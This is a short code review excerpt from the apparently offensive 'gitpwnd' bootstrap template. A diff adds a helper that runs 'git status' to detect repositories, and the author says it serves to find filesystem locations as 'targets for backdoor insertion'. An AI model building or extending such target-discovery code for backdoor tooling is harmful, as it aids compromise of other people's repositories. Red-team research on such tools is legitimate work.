gitpwnd/bootstrap.py.template

```diff
@@ -177,9 +177,17 @@ def find_root_of_git_repo(path):
         else:
             cur_dir = os.path.join(cur_dir, "..")
 
-# TODO: Iterate through all dirs in base_dir and find all the git repos
+def is_git_directory(path):
+    exit_code = subprocess.call(["git", "status"], cwd=path, stdout=open(os.devnull, 'w'), stderr=subprocess.STDOUT)
```

Comment:
> The way you're doing it is nice in that if we're in any subdirectory of a git repo it'll still work.

Right, that was my intention. This way, the function will work if we want to explore arbitrary other locations on the filesystem as potential targets for backdoor insertion. I don't think the overhead is *too* much; it makes sense to me to have something that works anywhere in the git repo as opposed to only in the root. Purely future-proofing, though.